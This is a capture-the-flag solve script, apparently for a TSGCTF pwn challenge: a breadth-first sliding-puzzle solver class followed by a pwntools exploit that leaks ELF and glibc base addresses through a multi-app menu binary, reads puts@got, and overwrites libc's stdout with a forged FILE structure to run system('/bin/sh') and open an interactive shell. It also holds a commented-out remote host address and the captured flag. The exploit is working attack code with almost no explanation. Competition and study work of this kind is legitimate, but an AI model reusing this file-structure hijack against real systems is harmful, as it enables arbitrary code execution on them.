# sliding puzzle solver generated by Google Gemini 3
import collections

class PuzzleSolver:
    """
    A solver for the 15-puzzle (sliding puzzle) designed to move a specific 'payload' block
    from a source position to a target position.
    """
    def __init__(self, width=4, height=4, initial_blank_idx=15):
        self.width = width
        self.height = height
        # Tracks the current position of the blank space (0) internally
        self.current_blank_idx = initial_blank_idx

    def get_coords(self, index):
        """Converts a linear index (0-15) to (x, y) coordinates."""
        return (index % self.width, index // self.width) # (x, y)

    def get_index(self, x, y):
        """Converts (x, y) coordinates back to a linear index."""
        return y * self.width + x

    def set_blank(self, index):
        """Manually resets the blank position (useful when the game restarts)."""
        self.current_blank_idx = index

    def get_blank_move_cmd(self, cur_blank, target_blank):
        """
        Determines the command ('a', 's', 'w', 'd') required to move the blank space
        from its current position to a target adjacent position.
        
        Note: The command represents the movement of the *tile* relative to the blank,
        which is inverted compared to the movement of the blank itself.
        """
        bx, by = cur_blank
        tx, ty = target_blank

        # 'a': Tile moves Left -> Blank moves Right (x + 1)
        if tx == bx + 1 and ty == by: return 'a'
        # 'd': Tile moves Right -> Blank moves Left (x - 1)
        if tx == bx - 1 and ty == by: return 'd'
        # 'w': Tile moves Up -> Blank moves Down (y + 1)
        if tx == bx and ty == by + 1: return 'w'
        # 's': Tile moves Down -> Blank moves Up (y - 1)
        if tx == bx and ty == by - 1: return 's'
        return None

    def bfs_blank(self, blank_pos, target_pos, payload_pos):
        """
        Uses BFS to find the shortest path for the blank square to reach a target position,
        treating the 'payload' square as an obstacle (cannot swap with payload here).
        """
        # Queue stores paths: [[start], [start, next], ...]
        queue = collections.deque([[blank_pos]])
        visited = {blank_pos}

        while queue:
            path = queue.popleft()
            curr = path[-1]
            if curr == target_pos:
                return path

            cx, cy = curr
            # Explore neighbors: Down, Up, Right, Left
            for dx, dy in [(0, 1), (0, -1), (1, 0), (-1, 0)]:
                nx, ny = cx + dx, cy + dy
                # Check boundaries
                if 0 <= nx < self.width and 0 <= ny < self.height:
                    next_pos = (nx, ny)
                    # Constraint: Blank cannot move through the payload during positioning
                    if next_pos != payload_pos and next_pos not in visited:
                        visited.add(next_pos)
                        new_path = list(path)
                        new_path.append(next_pos)
                        queue.append(new_path)
        return None

    def bfs_payload(self, start_pos, end_pos):
        """
        Uses BFS to calculate the shortest path for the payload block itself 
        from start to end, ignoring the blank space mechanics initially.
        """
        queue = collections.deque([[start_pos]])
        visited = {start_pos}

        while queue:
            path = queue.popleft()
            curr = path[-1]
            if curr == end_pos:
                return path

            cx, cy = curr
            for dx, dy in [(0, 1), (0, -1), (1, 0), (-1, 0)]:
                nx, ny = cx + dx, cy + dy
                if 0 <= nx < self.width and 0 <= ny < self.height:
                    if (nx, ny) not in visited:
                        visited.add((nx, ny))
                        new_path = list(path)
                        new_path.append((nx, ny))
                        queue.append(new_path)
        return None

    def solve(self, payload_idx, target_idx):
        """
        Generates the full sequence of moves to transport the payload from source to target.
        Automatically updates the internal state of the blank position.
        """
        payload_pos = self.get_coords(payload_idx)
        target_pos = self.get_coords(target_idx)
        blank_pos = self.get_coords(self.current_blank_idx)

        full_moves = ""

        # Step 1: Find the abstract path the payload needs to take
        payload_path = self.bfs_payload(payload_pos, target_pos)
        if not payload_path:
            print("No path found for payload!")
            return ""

        # Step 2: Iterate through each step of the payload's journey
        for i in range(len(payload_path) - 1):
            curr_p = payload_path[i]   # Current location of payload
            next_p = payload_path[i+1] # Next location payload wants to go

            # A. Move the blank space to 'next_p' (the spot the payload wants to occupy)
            #    while treating 'curr_p' (the payload) as an obstacle.
            blank_path = self.bfs_blank(blank_pos, next_p, curr_p)

            if not blank_path:
                print(f"Error: Cannot move blank to {next_p} without touching payload at {curr_p}")
                return ""

            # Convert blank path to keystrokes
            for j in range(len(blank_path) - 1):
                cmd = self.get_blank_move_cmd(blank_path[j], blank_path[j+1])
                full_moves += cmd

            # B. Swap the payload and the blank space
            #    Now blank is at 'next_p', payload is at 'curr_p'.
            #    We want payload at 'next_p', so blank must move to 'curr_p'.
            cmd = self.get_blank_move_cmd(next_p, curr_p)
            full_moves += cmd

            # Update internal tracking:
            # After the swap, the blank is now where the payload used to be.
            blank_pos = curr_p 
            
        # Update the class state with the final blank position
        self.current_blank_idx = self.get_index(blank_pos[0], blank_pos[1])
        
        return full_moves

# solve script starts here
from pwn import *

context.arch = 'amd64'
context.log_level = 'debug'
context.terminal = ['tmux', 'splitw', '-h']

p = gdb.debug('./chall_patched', '''
    continue
''')

# p = remote('34.84.25.24', 13579)

# see positions of setjmp and longjmp of four apps' functions in source code

# four apps' usages:
# 1. notepad: arbitrary read or arbitrary write by address at appropriate position within 4x4 sliding puzzle board on stack
# 2. pwquiz: generate elf address within 4x4 sliding puzzle board on stack
# 3. slide_puzzle: leak value within 4x4 sliding puzzle board on stack; move any address within 4x4 sliding puzzle board on stack to any position
# 4. int_float_translater: place any address into 4x4 sliding puzzle board on stack

glibc_e = ELF('./libc.so.6')

# 1. launch notepad app and do nothing to give it launched status
p.sendlineafter(b"May I help you? > ", b'1')
p.sendlineafter(b"1: edit, 0: save and quit > ", b'0')

# 2. launch slide_puzzle app and do nothing to give it launched status
p.sendlineafter(b"May I help you? > ", b'3')
puzzle_solver = PuzzleSolver()
p.sendlineafter(b"a: left, s: down, w: up, d: right, q: save and quit > ", b'q')

# 3. launch pwquiz app and do nothing to generate elf address within 4x4 sliding puzzle board on stack
p.sendlineafter(b"May I help you? > ", b'2')
p.sendlineafter(b"1~3: hint, 4: answer, 0: quit > ", b'0')

# 4. launch slide_puzzle app and leak elf address within 4x4 sliding puzzle board on stack
p.sendlineafter(b"May I help you? > ", b'3')
leak = p.recvline().strip().split(b' ')
elf_base_addr = (((int(leak[1], 10)&0xffffffff)<<32)|(int(leak[0], 10)&0xffffffff))-0x2080
log.info(f"elf base address: {hex(elf_base_addr)}")
p.sendlineafter(b"a: left, s: down, w: up, d: right, q: save and quit > ", b'q')

# 5. launch int_float_translater app and place puts@got into 4x4 sliding puzzle board on stack
p.sendlineafter(b"May I help you? > ", b'4')
p.sendlineafter(b"1: uint64 to float64, 2: float64 to uint64, 0: quit > ", b'1')
p.sendlineafter(b"num(uint64) > ", str(elf_base_addr+0x3f60).encode())
p.sendlineafter(b"1: uint64 to float64, 2: float64 to uint64, 0: quit > ", b'q')

# 6. launch slide_puzzle app and move puts@got within 4x4 sliding puzzle board on stack to appropriate position
p.sendlineafter(b"May I help you? > ", b'3')
p.sendlineafter(b"a: left, s: down, w: up, d: right, q: save and quit > ", puzzle_solver.solve(9, 3).encode())
p.sendlineafter(b"a: left, s: down, w: up, d: right, q: save and quit > ", puzzle_solver.solve(8, 2).encode())
p.sendlineafter(b"a: left, s: down, w: up, d: right, q: save and quit > ", b'q')

# 7. launch notepad app and arbitrary read from puts@got to leak glibc address
p.sendlineafter(b"May I help you? > ", b'1')
p.recvuntil(b"saved content: ")
glibc_base_addr = u64(p.recvline().strip().ljust(8, b'\x00'))-glibc_e.sym.puts
log.info(f"glibc base address: {hex(glibc_base_addr)}")
p.sendlineafter(b"1: edit, 0: save and quit > ", b'0')

# 8. launch int_float_translater app and place libc stdout into 4x4 sliding puzzle board on stack
p.sendlineafter(b"May I help you? > ", b'4')
p.sendlineafter(b"1: uint64 to float64, 2: float64 to uint64, 0: quit > ", b'1')
p.sendlineafter(b"num(uint64) > ", str(glibc_base_addr+glibc_e.symbols['_IO_2_1_stdout_']).encode())
p.sendlineafter(b"1: uint64 to float64, 2: float64 to uint64, 0: quit > ", b'q')

# 9. launch slide_puzzle app and move libc stdout within 4x4 sliding puzzle board on stack to appropriate position
p.sendlineafter(b"May I help you? > ", b'3')
p.sendlineafter(b"a: left, s: down, w: up, d: right, q: save and quit > ", puzzle_solver.solve(9, 3).encode())
p.sendlineafter(b"a: left, s: down, w: up, d: right, q: save and quit > ", puzzle_solver.solve(8, 2).encode())
p.sendlineafter(b"a: left, s: down, w: up, d: right, q: save and quit > ", b'q')

# 10. launch notepad app and arbitrary write to libc stdout to trigger fsop
p.sendlineafter(b"May I help you? > ", b'1')
p.sendlineafter(b"1: edit, 0: save and quit > ", b'1')
fake = FileStructure(0)
fake.flags = 0x3b01010101010101
fake._IO_read_end = glibc_base_addr+glibc_e.sym.system
fake._IO_write_end = u64(b'/bin/sh\x00')
fake._IO_save_base = glibc_base_addr+next(glibc_e.search(asm('add rdi, 0x10; jmp rcx;')))
fake._lock = glibc_base_addr+glibc_e.symbols['_IO_stdfile_1_lock']
fake._codecvt = glibc_base_addr+glibc_e.symbols['_IO_2_1_stdout_']+0xb8
fake._wide_data = glibc_base_addr+glibc_e.symbols['_IO_2_1_stdout_']+0x200
fake.unknown2 = p64(0)*2+p64(glibc_base_addr+glibc_e.symbols['_IO_2_1_stdout_']+0x20)+p64(0)*3
fake.vtable = glibc_base_addr+glibc_e.symbols['_IO_wfile_jumps']-0x18
p.sendlineafter(b"enter the content > ", bytes(fake))

p.interactive()

# TSGCTF{W3_4re_l00k1n9_4_5ee1n9_y0u_1n_TSGLAND_a9a1n_ff7c51fb6d50f181}